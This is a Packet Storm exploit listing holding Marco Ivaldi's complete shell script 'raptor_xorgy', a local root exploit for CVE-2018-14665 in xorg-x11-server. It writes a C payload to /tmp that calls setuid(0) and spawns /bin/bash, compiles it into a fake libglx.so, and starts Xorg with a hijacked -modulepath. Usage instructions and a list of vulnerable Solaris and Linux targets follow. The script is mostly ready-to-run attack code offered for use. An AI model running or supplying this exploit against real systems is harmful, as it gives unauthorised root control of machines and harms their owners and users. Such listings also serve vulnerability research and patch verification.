Lucene search

K
packetstormMarco IvaldiPACKETSTORM:150554
HistoryDec 01, 2018 - 12:00 a.m.

xorg-x11-server modulepath Local Privilege Escalation

2018-12-0100:00:00
Marco Ivaldi
packetstormsecurity.com
54

0.024 Low

EPSS

Percentile

88.7%

`#!/bin/sh  
  
#  
# raptor_xorgy - xorg-x11-server LPE via modulepath switch  
# Copyright (c) 2018 Marco Ivaldi <[email protected]>  
#  
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission   
# check for -modulepath and -logfile options when starting Xorg. X server   
# allows unprivileged users with the ability to log in to the system via   
# physical console to escalate their privileges and run arbitrary code under   
# root privileges (CVE-2018-14665).  
#  
# This exploit variant triggers the bug in the -modulepath command line switch  
# to load a malicious X11 module in order to escalate privileges to root on  
# vulnerable systems. This technique is less invasive than exploiting the   
# -logfile switch, however the gcc compiler must be present in order for it to  
# work out of the box. Alternatively, you must use a pre-compiled malicious .so  
# compatible with the target system and modify the exploit accordingly.  
#  
# It works very reliably on Solaris 11.4 and should work on most vulnerable  
# Linux distributions (though I haven't tested it). For some reason, it fails to  
# obtain uid 0 on OpenBSD... They might have an additional protection in place.  
#  
# Thanks to @alanc and @nushinde for discussing this alternative vector.  
#  
# See also:  
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm  
# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm  
# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html  
# https://nvd.nist.gov/vuln/detail/CVE-2006-0745  
#  
# Usage:  
# raptor@stalker:~$ chmod +x raptor_xorgy  
# raptor@stalker:~$ ./raptor_xorgy  
# [...]  
# root@stalker:~# id  
# uid=0(root) gid=0(root)  
#  
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):  
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]  
# Oracle Solaris 11 SPARC [untested]  
# CentOS Linux 7 [untested, it should work]  
# Red Hat Enterprise Linux 7 [untested]  
# Ubuntu Linux 18.10 [untested]  
# Ubuntu Linux 18.04 LTS [untested]  
# Ubuntu Linux 16.04 LTS [untested]  
# Debian GNU/Linux 9 [untested]  
# [...]  
#  
  
echo "raptor_xorgy - xorg-x11-server LPE via modulepath switch"  
echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>"  
echo  
  
# prepare the payload  
cat << EOF > /tmp/pwned.c  
_init()  
{  
setuid(0);  
setgid(0);  
system("/bin/bash");  
}  
EOF  
# libglx.so should be a good target, refer to Xorg logs for other candidates  
gcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so  
if [ $? -ne 0 ]; then echo; echo "error: cannot compile /tmp/pwned.c"; exit; fi  
  
# trigger the bug  
echo "Got root?"  
Xorg -modulepath ",/tmp" :1  
  
`